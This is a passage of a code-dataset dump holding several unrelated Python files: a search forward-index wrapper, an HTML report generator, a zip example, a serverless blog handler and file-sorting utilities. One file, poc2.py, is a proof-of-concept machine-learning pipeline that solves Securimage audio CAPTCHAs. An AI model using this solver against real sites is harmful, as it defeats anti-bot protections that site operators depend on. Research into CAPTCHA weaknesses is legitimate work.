attribute.\".format(attr))\n","sub_path":"leabra7/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"497936412","text":"\"\"\"\nAccess to FlexNeuART forward index.\n\"\"\"\nfrom collections import namedtuple\n\nDocEntryParsed=namedtuple('DocEntryParsed',\n ['word_ids', # a list of unique word IDs\n 'word_qtys', # a list of the # of occurrences of unique words\n 'word_id_seq', # a sequence of word IDs as they appear in a document at index time (may be\n # missing stop words). It is None for non-positional indices\n 'doc_len', # document length in the number of words (at index time)\n ])\n\nWordEntry=namedtuple('WordEntry',\n ['word_id', # word ID\n 'word_freq' # of documents containing at least one of these words\n ])\n\nclass ForwardIndex:\n def __init__(self, resource_manager, field_name):\n \"\"\"Constructor of the forward index wrapper object.\n\n :param resource_manager: a resource manager reference.\n :param field_name: the name of the field, e.g., text\n \"\"\"\n self.field_name = field_name\n self.indx = resource_manager.getFwdIndex(field_name)\n self.is_raw = self.indx.isRaw()\n\n\n def get_doc_raw(self, doc_id):\n \"\"\"Obtain the raw-document text. 
Must be a raw-field.\n\n :param doc_id: a document ID (e.g., returned by a candidate provider)\n :return: document text or None if no such document exists\n \"\"\"\n self.check_raw_or_not(check_raw=True)\n\n return self.indx.getDocEntryRaw(doc_id)\n\n def get_word_entry_by_id(self, word_id):\n \"\"\"Retrieve word entry/info by word ID\n\n :param word_id: an integer word ID\n :return: an object of the type WordEntry or None\n \"\"\"\n self.check_raw_or_not(check_raw=False)\n assert type(word_id) == int, \"word_id must be integer!\"\n\n entry = self.indx.getWordEntry(word_id)\n if entry is None:\n return None\n\n return WordEntry(word_id=entry.mWordId, word_freq=entry.mWordFreq)\n\n def get_word_by_id(self, word_id):\n \"\"\"Retrieve the word string by ID.\n\n :param word_id: an integer word ID\n :return: a word or None if ID does not exist\n \"\"\"\n self.check_raw_or_not(check_raw=False)\n assert type(word_id) == int, \"word_id must be integer!\"\n\n return self.indx.getWord(word_id)\n\n def get_doc_parsed(self, doc_id):\n \"\"\"Get a parsed document entry.\n\n :param doc_id: a document ID (e.g., returned by a candidate provider)\n :return: an object of the type DocEntryParsed\n \"\"\"\n self.check_raw_or_not(check_raw=False)\n\n entry = self.indx.getDocEntryParsed(doc_id)\n if entry is None:\n return None\n\n return DocEntryParsed(word_ids=entry.mWordIds, word_qtys=entry.mQtys,\n word_id_seq=entry.mWordIdSeq, doc_len=entry.mDocLen)\n\n def check_raw_or_not(self, check_raw):\n if check_raw:\n if not self.is_raw:\n raise Exception(f'Field {self.field_name} is parsed and not raw text!')\n else:\n if self.is_raw:\n raise Exception(f'Field {self.field_name} is raw text rather than parsed documents!')\n\n\ndef get_forward_index(resource_manager, field_name):\n \"\"\"Create a wrapper for a forward index class.\n\n :param resource_manager: a resource manager reference.\n :param field_name: the name of the field, e.g., text\n\n :return: an object of the type ForwardIndex. There will be an exception if the index is not present.\n \"\"\"\n return ForwardIndex(resource_manager, field_name)\n\n","sub_path":"scripts/py_flexneuart/fwd_index.py","file_name":"fwd_index.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"151045350","text":"\"\"\"natcap.invest.reporting package.\"\"\"\n\nimport os\nimport logging\nimport codecs\nimport re\nimport copy\n\nfrom ... import invest\nfrom .. import utils\nfrom osgeo import gdal\nfrom . 
import table_generator\n\n\nLOGGER = logging.getLogger('natcap.invest.reporting')\nREPORTING_DATA = os.path.join(invest.local_dir(__file__), 'reporting_data/')\nJQUERY_URI = os.path.join(REPORTING_DATA, 'jquery-1.10.2.min.js')\nSORTTABLE_URI = os.path.join(REPORTING_DATA, 'sorttable.js')\nTOTALS_URI = os.path.join(REPORTING_DATA, 'total_functions.js')\n\n\ndef generate_report(args):\n \"\"\"Generate an html page from the arguments given in 'reporting_args'\n\n reporting_args[title] - a string for the title of the html page\n (required)\n\n reporting_args[sortable] - a boolean value indicating whether\n the sorttable.js library should be added for table sorting\n functionality (optional)\n\n reporting_args[totals] - a boolean value indicating whether\n the totals_function.js script should be added for table totals\n functionality (optional)\n\n reporting_args[out_uri] - a URI to the output destination for the html\n page (required)\n\n reporting_args[elements] - a list of dictionaries that represent html\n elements to be added to the html page. (required) If no elements\n are provided (list is empty) a blank html page will be generated.\n The 3 main element types are 'table', 'head', and 'text'.\n All elements share the following arguments:\n 'type' - a string that depicts the type of element being add.\n Currently 'table', 'head', and 'text' are defined\n (required)\n\n 'section' - a string that depicts whether the element belongs\n in the body or head of the html page.\n Values: 'body' | 'head' (required)\n\n Table element dictionary has at least the following additional\n arguments:\n 'attributes' - a dictionary of html table attributes. The\n attribute name is the key which gets set to the value\n of the key. (optional)\n Example: {'class': 'sorttable', 'id': 'parcel_table'}\n\n 'sortable' - a boolean value for whether the tables columns\n should be sortable (required)\n\n 'checkbox' - a boolean value for whether there should be a\n checkbox column. If True a 'selected total' row will be\n added to the bottom of the table that will show the\n total of the columns selected (optional)\n\n 'checkbox_pos' - an integer value for in which column\n position the the checkbox column should appear\n (optional)\n\n 'data_type' - one of the following string values:\n 'shapefile'|'hg csv'|'dictionary'. Depicts the type of data\n structure to build the table from (required)\n\n 'data' - either a list of dictionaries if 'data_type' is\n 'dictionary' or a URI to a CSV table or shapefile if\n 'data_type' is 'shapefile' or 'csv' (required). If a\n list of dictionaries, each dictionary should have\n keys that represent the columns, where each dictionary\n is a row (list could be empty)\n How the rows are ordered are defined by their\n index in the list. Formatted example:\n [{col_name_1: value, col_name_2: value, ...},\n {col_name_1: value, col_name_2: value, ...},\n ...]\n\n 'key' - a string that defines which column or field should be\n used as the keys for extracting data from a shapefile or\n csv table 'key_field'.\n (required for 'data_type' = 'shapefile' | 'csv')\n\n 'columns'- a list of dictionaries that defines the column\n structure for the table (required). The order of the\n columns from left to right is depicted by the index\n of the column dictionary in the list. 
Each dictionary\n            in the list has the following keys and values:\n                'name' - a string for the column name (required)\n                'total' - a boolean for whether the column should be\n                    totaled (required)\n                'attr' - a dictionary that has key value pairs for\n                    optional tag attributes (optional). Ex:\n                    'attr': {'class': 'offsets'}\n                'td_class' - a String to assign as a class name to\n                    the table data tags under the column. Each\n                    table data tag under the column will have a class\n                    attribute assigned to 'td_class' value (optional)\n\n            'total'- a boolean value for whether there should be a constant\n                total row at the bottom of the table that sums the column\n                values (optional)\n\n        Head element dictionary has at least the following additional\n        arguments:\n            'format' - a string representing the type of head element being\n                added. Currently 'script' (javascript) and 'style' (css\n                style) accepted (required)\n\n            'data_src'- a URI to the location of the external file for\n                either the 'script' or the 'style' OR a String representing\n                the html script or style (DO NOT include the tags)\n                (required)\n\n            'input_type' - a String, 'File' or 'Text' that refers to how\n                'data_src' is being passed in (URI vs String) (required).\n\n            'attributes' - a dictionary that has key value pairs for\n                optional tag attributes (optional). Ex:\n                'attributes': {'id': 'muni_data'}\n\n        Text element dictionary has at least the following additional\n        arguments:\n            'text'- a string to add as a paragraph element in the html page\n                (required)\n\n    returns - nothing\"\"\"\n\n    LOGGER.info('Creating HTML Report')\n    # Since the dictionary is being mutated, make a copy to mutate on\n    # while keeping the integrity of the original\n    reporting_args = copy.deepcopy(args)\n    # Get the title for the html page and place it in a string with html\n    # title tags\n    html_title = '<title>%s</title>' % reporting_args['title']\n\n    # Initiate the html dictionary which will store all the head and body\n    # elements. The 'head' and 'body' keys each point to a list that holds\n    # the string representations of the html elements in the order they\n    # should be written out later in 'write_html'.\n    # Initialize head's first element to be the title so that it is always\n    # written first\n    html_obj = {'head':[html_title], 'body':[]}\n\n    # A dictionary of 'types' that point to corresponding functions. 
When an\n    # 'element' is passed in the 'type' will be one of the defined types below\n    # and will execute a function that properly handles that element\n    report = {\n        'table': build_table,\n        'text' : add_text_element,\n        'head': add_head_element\n        }\n\n    LOGGER.debug('Adding default JavaScript libs')\n    # Add Jquery file to the elements list any time an html page is generated\n    jquery_dict = {\n        'type': 'head', 'section': 'head', 'format': 'script',\n        'data_src': JQUERY_URI, 'input_type':'File'}\n    reporting_args['elements'].insert(0, jquery_dict)\n\n    # A list of tuples of possible default js libraries / scripts to add\n    jsc_lib_list = [('totals', TOTALS_URI), ('sortable', SORTTABLE_URI)]\n    # Used to have control of how the js libraries / scripts get added\n    index = 1\n    for lib_tup in jsc_lib_list:\n        if (lib_tup[0] in reporting_args) and reporting_args[lib_tup[0]]:\n            # Build up the dictionary for the script head element\n            lib_dict = {\n                'type': 'head', 'section': 'head', 'format': 'script',\n                'data_src': lib_tup[1], 'input_type':'File'}\n            # Add dictionary to elements list\n            reporting_args['elements'].insert(index, lib_dict)\n            index = index + 1\n\n    # Iterate over the elements to be added to the html page\n    for element in reporting_args['elements']:\n        # There are 2 general purpose arguments that each element will have,\n        # 'type' and 'section'. Get and remove these from the\n        # elements dictionary (they should not be passed along to the\n        # individual element functions)\n        fun_type = element.pop('type')\n        section = element.pop('section')\n\n        # Process the element by calling it's specific function handler which\n        # will return a string. Append this to html dictionary to be written\n        # in write_html\n        html_obj[section].append(report[fun_type](element))\n\n    # Write the html page to 'out_uri'\n    write_html(html_obj, reporting_args['out_uri'])\n\n\ndef write_html(html_obj, out_uri):\n    \"\"\"Write an html file to 'out_uri' from html elements represented as strings\n        in 'html_obj'\n\n        html_obj - a dictionary with two keys, 'head' and 'body', that point to\n            lists. The list for each key is a list of the htmls elements as\n            strings (required)\n            example: {'head':['elem_1', 'elem_2',...],\n                      'body':['elem_1', 'elem_2',...]}\n\n        out_uri - a URI for the output html file\n\n        returns - nothing\"\"\"\n\n    LOGGER.debug('Writing HTML page')\n\n    # Start the string that will be written as the html file\n    html_str = '<html>'\n\n    for section in ['head', 'body']:\n        # Ensure the browser interprets the html file as utf-8\n        if section == 'head':\n            html_str += '<meta charset=\"UTF-8\">'\n\n        # Write the tag for the section\n        html_str += '<%s>' % section\n        # Get the list of html string elements for this section\n        sect_elements = html_obj[section]\n\n        for element in sect_elements:\n            # Add each element to the html string\n            if type(element) is str:\n                element = element\n            html_str += element\n\n        # Add the closing tag for the section\n        html_str += '</%s>' % section\n\n    # Finish the html tag\n    html_str += '</html>'\n\n    #LOGGER.debug('HTML Complete String : %s', html_str)\n\n    # If the URI for the html output file exists remove it\n    if os.path.isfile(out_uri):\n        os.remove(out_uri)\n\n    # Open the file, write the string and close the file\n    html_file = codecs.open(out_uri, 'wb', 'utf-8')\n    html_file.write(html_str)\n    html_file.close()\n\n\ndef build_table(param_args):\n    \"\"\"Generates a string representing a table in html format.\n\n    param_args - a dictionary that has the parameters for building up the\n        html table. 
The dictionary includes the following:\n\n 'attributes' - a dictionary of html table attributes. The attribute\n name is the key which gets set to the value of the key.\n (optional)\n Example: {'class': 'sorttable', 'id': 'parcel_table'}\n\n param_args['sortable'] - a boolean value that determines whether the\n table should be sortable (required)\n\n param_args['data_type'] - a string depicting the type of input to\n build the table from. Either 'shapefile', 'csv', or 'dictionary'\n (required)\n\n param_args['data'] - a URI to a csv or shapefile OR a list of\n dictionaries. If a list of dictionaries the data should be\n represented in the following format: (required)\n [{col_name_1: value, col_name_2: value, ...},\n {col_name_1: value, col_name_2: value, ...},\n ...]\n\n param_args['key'] - a string that depicts which column (csv) or\n field (shapefile) will be the unique key to use in extracting\n the data into a dictionary. (required for 'data_type'\n 'shapefile' and 'csv')\n\n param_args['columns'] - a list of dictionaries that defines the\n column structure for the table (required). The order of\n the columns from left to right is depicted by the index\n of the column dictionary in the list. Each dictionary\n in the list has the following keys and values:\n 'name' - a string for the column name (required)\n 'total' - a boolean for whether the column should be\n totaled (required)\n 'attr' - a dictionary that has key value pairs for\n optional tag attributes (optional). Ex:\n 'attr': {'class': 'offsets'}\n 'td_class' - a String to assign as a class name to\n the table data tags under the column. Each\n table data tag under the column will have a class\n attribute assigned to 'td_class' value (optional)\n\n param_args['total'] - a boolean value where if True a constant\n total row will be placed at the bottom of the table that sums\n the columns (required)\n\n returns - a string that represents an html table\n \"\"\"\n LOGGER.debug('Building Table Structure')\n # Initialize an intermediate dictionary which will hold the physical data\n # elements of the table\n data_dict = {}\n\n # Initialize the final dictionary which will have the data of the table as\n # well as parameters needed to build up the html table\n table_dict = {}\n\n # Get the data type of the input being passed in so that it can properly be\n # pre-processed\n data_type = param_args['data_type']\n\n # Get a handle on the input data being passed in, whether it a URI to a\n # shapefile / csv file or a list of dictionaries\n input_data = param_args['data']\n\n # Depending on the type of input being passed in, pre-process it\n # accordingly\n if data_type == 'shapefile':\n key = param_args['key']\n data_dict = extract_datasource_table_by_key(\n input_data, key)\n # Convert the data_dict to a list of dictionaries where each dictionary\n # in the list represents a row of the table\n data_list = data_dict_to_list(data_dict)\n elif data_type == 'csv':\n key = param_args['key']\n data_dict = utils.build_lookup_from_csv(input_data, key)\n # Convert the data_dict to a list of dictionaries where each dictionary\n # in the list represents a row of the table\n data_list = data_dict_to_list(data_dict)\n else:\n data_list = input_data\n\n #LOGGER.debug('Data Collected from Input Source: %s', data_list)\n LOGGER.debug('Data Collected from Input Source')\n\n # Add the columns data to the final dictionary that is to be passed\n # off to the table generator\n table_dict['cols'] = param_args['columns']\n\n # Add the properly formatted row data 
to the final dictionary that is\n # to be passed to the table generator\n table_dict['rows'] = data_list\n\n # If a totals row is present, add it to the final dictionary\n if 'total' in param_args:\n table_dict['total'] = param_args['total']\n\n # If table attributes were passed in check to see if the 'sortable' class\n # needs to be added to that list\n if 'attributes' in param_args:\n table_dict['attributes'] = param_args['attributes']\n if param_args['sortable']:\n try:\n class_list = table_dict['attributes']['class'] + ' sortable'\n table_dict['attributes']['class'] = class_list\n except KeyError:\n table_dict['attributes']['class'] = 'sortable'\n else:\n # Attributes were not passed in, however if sortable is True\n # create attributes key and dictionary to pass in to table\n # handler\n if param_args['sortable']:\n table_dict['attributes'] = {'class': 'sortable'}\n\n # If a checkbox column is wanted pass in the table dictionary\n if 'checkbox' in param_args and param_args['checkbox']:\n table_dict['checkbox'] = True\n if 'checkbox_pos' in param_args:\n table_dict['checkbox_pos'] = param_args['checkbox_pos']\n\n LOGGER.debug('Calling table_generator')\n # Call generate table passing in the final dictionary and attribute\n # dictionary. Return the generate string\n return table_generator.generate_table(table_dict)\n\n\ndef extract_datasource_table_by_key(datasource_uri, key_field):\n \"\"\"Return vector attribute table of first layer as dictionary.\n\n Create a dictionary lookup table of the features in the attribute table\n of the datasource referenced by datasource_uri.\n\n Args:\n datasource_uri (string): a uri to an OGR datasource\n key_field: a field in datasource_uri that refers to a key value\n for each row such as a polygon id.\n\n Returns:\n attribute_dictionary (dict): returns a dictionary of the\n form {key_field_0: {field_0: value0, field_1: value1}...}\n \"\"\"\n # Pull apart the datasource\n datasource = gdal.OpenEx(datasource_uri)\n layer = datasource.GetLayer()\n layer_def = layer.GetLayerDefn()\n\n # Build up a list of field names for the datasource table\n field_names = []\n for field_id in range(layer_def.GetFieldCount()):\n field_def = layer_def.GetFieldDefn(field_id)\n field_names.append(field_def.GetName())\n\n # Loop through each feature and build up the dictionary representing the\n # attribute table\n attribute_dictionary = {}\n for feature in layer:\n feature_fields = {}\n for field_name in field_names:\n feature_fields[field_name] = feature.GetField(field_name)\n key_value = feature.GetField(key_field)\n attribute_dictionary[key_value] = feature_fields\n\n # Explictly clean up the layers so the files close\n layer = None\n datasource = None\n return attribute_dictionary\n\n\ndef data_dict_to_list(data_dict):\n \"\"\"Abstract out inner dictionaries from data_dict into a list, where\n the inner dictionaries are added to the list in the order of\n their sorted keys\n\n data_dict - a dictionary with unique keys pointing to dictionaries.\n Could be empty (required)\n\n returns - a list of dictionaries, or empty list if data_dict is empty\"\"\"\n\n data_list = []\n data_keys = list(data_dict)\n data_keys.sort()\n for key in data_keys:\n data = data_dict[key]\n data_list.append(data)\n\n return data_list\n\n\ndef add_text_element(param_args):\n \"\"\"Generates a string that represents a html text block. 
The input string\n        should be wrapped in proper html tags\n\n        param_args - a dictionary with the following arguments:\n\n        param_args['text'] - a string\n\n        returns - a string\n    \"\"\"\n\n    return param_args['text']\n\n\ndef add_head_element(param_args):\n    \"\"\"Generates a string that represents a valid element in the head section\n        of an html file. Currently handles 'style' and 'script' elements,\n        where both the script and style are locally embedded\n\n        param_args - a dictionary that holds the following arguments:\n\n        param_args['format'] - a string representing the type of element to\n            be added. Currently : 'script', 'style' (required)\n\n        param_args['data_src'] - a string URI path for the external source\n            of the element OR a String representing the html\n            (DO NOT include html tags, tags are automatically generated).\n            If a URI the file is read in as a String. (required)\n\n        param_args['input_type'] - 'Text' or 'File'. Determines how the\n            input from 'data_src' is handled (required)\n\n        'attributes' - a dictionary that has key value pairs for\n            optional tag attributes (optional). Ex:\n            'attributes': {'class': 'offsets'}\n\n        returns - a string representation of the html head element\"\"\"\n\n    LOGGER.info('Preparing to generate head element as String')\n\n    # Get the type of element to add\n    form = param_args['format']\n    # Get a handle on the data whether it be a String or URI\n    src = param_args['data_src']\n    # Get the input type of the data, 'File' or 'Text'\n    input_type = param_args['input_type']\n    if input_type == 'File':\n        # Read in file and save as string. Using latin1 to decode, seems to\n        # work on the current javascript / css files\n        head_file = codecs.open(src, 'rb', 'latin1')\n        file_str = head_file.read()\n    else:\n        file_str = src\n\n    attr = ''\n    if 'attributes' in param_args:\n        for key, val in param_args['attributes'].items():\n            attr += '%s=\"%s\" ' % (key, val)\n\n    # List of regular expression strings to search against\n    reg_list = [r'<script.*>', r'<style.*>']\n\n    # Iterate over the String object to make sure there are no conflicting html\n    # tags\n    for exp in reg_list:\n        if re.search(exp, file_str) != None:\n            raise Exception('The following html tag was found in header'\n                            ' string : %s. 
Please do not place any html tags in'\n                            ' the header elements' % exp)\n\n    if form == 'style':\n        html_str = \"\"\"<style %s type=\"text/css\">%s</style>\"\"\" % (attr, file_str)\n    elif form == 'script':\n        html_str = \"\"\"<script %s type=\"text/javascript\">%s</script>\"\"\" % (attr, file_str)\n    elif form == 'json':\n        html_str = \"\"\"<script %s type=\"application/json\">%s</script>\"\"\" % (attr, file_str)\n    else:\n        raise Exception('Currently this type of head element is not supported'\n                        ' : %s' % form)\n\n    return html_str\n","sub_path":"src/natcap/invest/reporting/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":22481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"536820287","text":"# import os\nimport shutil\nfrom os import path\n\n\ndef main():\n    # make a duplicate of an existing file\n    if path.exists(\"newfile.txt\"):\n        # get the path to the file in the current directory\n        src = path.realpath(\"newfile.txt\")\n\n        # Separate the path part from the filename\n        head, tail = path.split(src)\n        print(\"path : \" + head)\n        print(\"tail : \" + tail)\n\n        # now let's put things into a ZIP archive\n        root_dir, tail = path.split(src)\n\n        shutil.make_archive(\"archive_test\", \"zip\", root_dir)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Python_Up_And_Running/03 - Working with Files/06_1_Zip.py","file_name":"06_1_Zip.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"}
+{"seq_id":"170390128","text":"import json\nimport random\nimport os\n\nimport numpy as np\nimport scipy.io.wavfile\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom collectTrainData2 import collectTrainData\nfrom getPotentialSpeakLocation import getPotentialSpeakLocation\nfrom FeatureExtraction import Rasta,Mfcc,Raw\nfrom MLAlgo import KNN, SVM, NeuralNetFeatures, NeuralNetRaw\n\n\ndef runPipeline(dir_train, dir_test, left, right, mlModel, featureExtraction, applyPca):\n    #1.collect the raw train data\n    print(\"Collect raw train data from %s...\"%(dir_train))\n    X_train,y_train,rate = collectTrainData(dir_train, left, right)\n\n    #2. feature extraction\n    print(\"Apply feature extraction to the raw data...\")\n    X_train = featureExtraction(X_train, rate)\n\n    pca = PCA(n_components = 0.95)\n    scaler = MinMaxScaler()\n\n    #******PCA (optional)\n    if applyPca:\n        print(\"Apply PCA to reduce the dimensionality of the data to 95%...\")\n        # X_train = scaler.fit_transform(X_train)\n        pca.fit(X_train)\n        X_train = pca.transform(X_train)\n\n    #3. train the model\n    print(\"Train the model...\")\n    mlModel.train(X_train, y_train)\n\n    #4. solve each test data\n    print(\"Solve each test input from %s:\"%dir_test)\n    prefixes = list(set([x.split('.')[0] for x in os.listdir(DIR_TEST)])) #list all files names\n    prefixes = sorted(prefixes)\n    count = 0\n    count_34th = 0\n    indiv_count = 0\n    for i in range(len(prefixes)):\n        prefix = prefixes[i]\n        #4.1. Read the file\n        wavFile = os.path.join(DIR_TEST, prefix + \".wav\")\n        outFile = os.path.join(DIR_TEST, prefix + \".txt\")\n        #read/parse .wav file and .txt file\n        rate, data = scipy.io.wavfile.read(wavFile)\n        data = np.asarray([0] * LEFT + list(data) + [0] * RIGHT)\n        output = json.load(open(outFile))\n        #4.2. 
Get potential spoken locs\n locs = getPotentialSpeakLocation(data, rate, LEFT, RIGHT, 4)\n #Get the expectedLocs from the test file\n expectedLocs = map(int, output[\"offsets\"][1:-1].split(','))\n expectedLocs = [(x + LEFT) for x in expectedLocs]\n print(\"======Test %d:\"%(i))\n print(\"Actual spoken locs = \" + str(locs))\n print(\"Expected spoken locs = \" + str(expectedLocs))\n #4.3. Build the answer\n captchas = \"\"\n signals = []\n #Iterate through each loc\n for loc in locs:\n sta = loc - LEFT\n fin = loc + RIGHT\n signals.append(data[sta:fin])\n signals = np.array(signals)\n #feature extraction\n signals = featureExtraction(signals, rate)\n #******PCA (optional)\n if applyPca:\n # signals = scaler.fit_transform(signals)\n signals = pca.transform(signals)\n #predict the output for each individual token\n predictedVals = mlModel.predict(signals)\n for c in predictedVals:\n captchas += str(c) if c < 10 else chr(ord('a') + c - 10)\n if captchas == output[\"code\"]:\n count += 1\n cur_cnt = 0\n for i in range(4):\n if captchas[i] == output[\"code\"][i]:\n cur_cnt += 1\n indiv_count += 1\n if cur_cnt == 3:\n count_34th += 1\n print(\"Actual output = %s | Expected output = %s\"%(captchas, output[\"code\"]))\n\n print(\"Accuracy = %.4f\"%(count/len(prefixes)))\n print(\"3/4th Accuracy = %.4f\"%((count + count_34th)/len(prefixes)))\n print(\"Accuracy of Individual Digits = %.4f\"%((indiv_count)/(len(prefixes) * 4)))\n\n#########CONFIGURATION FOR THE PIPELINE\nif __name__ == '__main__':\n DIR_TRAIN = os.path.join(\"data\", \"securimage_all\", \"train\")\n DIR_TEST = os.path.join(\"data\", \"securimage_all\", \"test\")\n LEFT = 2500\n RIGHT = 2500\n MLMODEL = SVM()\n FEATURE_EXTRATION = Mfcc(flatten=True)\n runPipeline(DIR_TRAIN, DIR_TEST, LEFT, RIGHT, MLMODEL, FEATURE_EXTRATION, applyPca=True)\n","sub_path":"poc2.py","file_name":"poc2.py","file_ext":"py","file_size_in_byte":3956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"369954241","text":"# -*- coding: utf8 -*-\nimport json\n\ntestArticleInfo=[\n {\"id\":1,\"category\":\"blog\",\"title\":\"hello world\",\"content\":\"first blog! 
hello world!\",\"time\":\"2017-12-05 13:45\"},\n {\"id\":2,\"category\":\"blog\",\"title\":\"record info\",\"content\":\"record work and study!\",\"time\":\"2017-12-06 08:22\"},\n {\"id\":3,\"category\":\"python\",\"title\":\"python study\",\"content\":\"python study for 2.7\",\"time\":\"2017-12-06 18:32\"},\n]\n\ndef main_handler(event,content):\n if \"requestContext\" not in event.keys():\n return {\"errorCode\":410,\"errorMsg\":\"event is not come from api gateway\"}\n if event[\"requestContext\"][\"path\"] != \"/article/{articleId}\" and event[\"requestContext\"][\"path\"] != \"/article\":\n return {\"errorCode\":411,\"errorMsg\":\"request is not from setting api path\"}\n if event[\"requestContext\"][\"path\"] == \"/article\" and event[\"requestContext\"][\"httpMethod\"] == \"GET\": # Get article list\n retList = []\n for article in testArticleInfo:\n retItem = {}\n retItem[\"id\"] = article[\"id\"]\n retItem[\"category\"] = article[\"category\"]\n retItem[\"title\"] = article[\"title\"]\n retItem[\"time\"] = article[\"time\"]\n retList.append(retItem)\n return retList\n if event[\"requestContext\"][\"path\"] == \"/article/{articleId}\" and event[\"requestContext\"][\"httpMethod\"] == \"GET\": # Get content\n articleId = int(event[\"pathParameters\"][\"articleId\"])\n for article in testArticleInfo:\n if article[\"id\"] == articleId:\n return article\n return {\"errorCode\":412,\"errorMsg\":\"article is not found\"}\n return {\"errorCode\":413,\"errorMsg\":\"request is not correctly execute\"}\n","sub_path":"qcloud/blogArticle.py","file_name":"blogArticle.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"510836731","text":"import json\nimport yaml\nimport re\nimport logging\nimport os\nimport time\nimport hashlib\nfrom itertools import cycle\n\n\n# https://stackoverflow.com/questions/1131220/get-md5-hash-of-big-files-in-python\ndef md5_checksum(f, block_size=2**20):\n md5 = hashlib.md5()\n while True:\n data = f.read(block_size)\n if not data:\n break\n md5.update(data)\n return md5.hexdigest()\n\n\ndef find_key(key, var):\n \"\"\"Finds all occurrences of a key in a nested dictionary, useful for gobbling up\n stuff from json files.\n\n All credit due to https://stackoverflow.com/questions/9807634/\\\n find-all-occurrences-of-a-key-in-nested-python-dictionaries-and-lists\n \"\"\"\n if hasattr(var, 'items'):\n for k, v in var.items():\n if k == key:\n yield v\n if isinstance(v, dict):\n for result in find_key(key, v):\n yield result\n elif isinstance(v, list):\n for d in v:\n for result in find_key(key, d):\n yield result\n\n\ndef read_config(file, destination=None, user=None, host=None, cmd_host=None, copy_protocol=None):\n \"\"\"Simple yaml reader to parse config files\n\n Args:\n file: the yaml file to read the configuration from\n Returns:\n config: a dictionary with the j keys, the path variable they map to, and other bells and whistles...\n\n \"\"\"\n with open(file) as config_yaml:\n base_yaml = yaml.safe_load(config_yaml)\n\n # with config loaded, make sure we have the keys that we need\n\n base_config = {\n 'keys': [],\n 'map': [],\n 'default': [],\n 'required_files': [],\n 'path': None,\n 'destination': destination,\n 'command': {\n 'exts': [],\n 'run': None\n }\n }\n\n router_config = {\n 'key': [],\n 'files': [],\n 'filter': None,\n 'invert': None,\n 'lowercase': None,\n 'exact': None\n }\n\n remote_config = {\n 'user': user,\n 'host': host,\n 'copy_protocol': copy_protocol,\n 
'cmd_host': cmd_host,\n }\n\n if 'dassort' in base_yaml.keys() and 'remote' in base_yaml.keys():\n tree_yaml = base_yaml['dassort']\n map_json = tree_yaml['json']\n base_config = merge_dicts(base_config, map_json)\n base_config = merge_dicts(base_config, tree_yaml)\n remote_yaml = base_yaml['remote']\n remote_config = merge_dicts(remote_config, remote_yaml)\n router_config = None\n elif 'dassort' in base_yaml.keys():\n tree_yaml = base_yaml['dassort']\n map_json = tree_yaml['json']\n base_config = merge_dicts(base_config, map_json)\n base_config = merge_dicts(base_config, tree_yaml)\n remote_config = None\n router_config = None\n elif 'router' in base_yaml.keys():\n tree_yaml = base_yaml['router']\n router_config = merge_dicts(router_config, tree_yaml)\n # all router items should be iterables\n for k, v in router_config.items():\n if type(v) is not list:\n router_config[k] = [v]\n base_config = None\n remote_config = None\n else:\n base_config = None\n remote_config = None\n router_config = None\n\n # reformat base configuration\n if base_config is not None:\n base_config = {\n 'keys': base_config['keys'],\n 'map': base_config['map'],\n 'default': base_config['default'],\n 'required_files': base_config['required_files'],\n 'value': [],\n 'path': {\n 'path_string': base_config['path'],\n 're': {'root': base_config['destination']}\n },\n 'command': base_config['command'],\n }\n\n return base_config, remote_config, router_config\n\n\ndef merge_dicts(dict1, dict2):\n \"\"\"Merge dictionary 2 values into dictionary 1, contingent on dictionary 1 containing\n a given key.\n\n Args:\n dict1: source dictionary\n dict2: merge dictionary\n Returns:\n merge_dict: dict2 merged into dict1\n \"\"\"\n merge_dict = dict1\n\n for key, value in dict1.items():\n if key in dict2:\n merge_dict[key] = dict2[key]\n\n return merge_dict\n\n\ndef build_path(key_dict, path_string):\n \"\"\"Takes our path string and replaces variables surrounded by braces and prefixed by $\n with a particular value in a key dictionary\n\n Args:\n key_dict: dictionary where each key, value pair corresponds to a variable and its value\n path_string: path string that specifies how to build our target path_string\n Returns:\n path_string: new path to use\n\n For example, if the path_string is ${root}/${subject} and key_dict is {'root':'cooldrive','subject':'15781'}\n the path_string is converted to cooldrive/15781\n \"\"\"\n for key, value in key_dict.items():\n path_string = re.sub('\\$\\{' + key + '\\}', value, path_string)\n\n return path_string\n\n\ndef get_listing_manifest(proc):\n \"\"\"Gets the files to ship off with a corresponding json file. 
If the json file lives in a sub-folder,\n all files in the folder become part of the manifest, if it does not, then all files with a matching filename\n become part of the manifest.\n\n Args:\n proc: File or directory to process\n Returns:\n listing_manifest: Files to process with json file\n json_file: Json file associated with the manifest\n\n \"\"\"\n # json is always LAST since it may trigger other copies...\n # https://stackoverflow.com/questions/44214910/select-the-first-n-smallest-files-from-a-folder\n if os.path.isdir(proc):\n isdir = True\n # sort the listing by size, we want big files in the back\n tmp_listing = os.listdir(proc)\n tmp_listing = sorted(tmp_listing, key=lambda x: os.path.getsize(os.path.join(proc, x)))\n tmp_json = [os.path.join(proc, f)\n for f in tmp_listing\n if f.endswith('.json')]\n json_file = tmp_json[0]\n listing_manifest = [os.path.join(proc, f)\n for f in tmp_listing\n if os.path.isfile(os.path.join(proc, f))\n and not f.endswith('.json')]\n [listing_manifest.append(_) for _ in tmp_json]\n else:\n isdir = False\n json_file = proc\n filename = os.path.splitext(os.path.basename(proc))[0]\n dirname = os.path.dirname(proc)\n listing_manifest = [os.path.join(dirname, f)\n for f in os.listdir(dirname)\n if f.startswith(filename)\n and not f.endswith('.json')]\n listing_manifest.append(json_file)\n\n 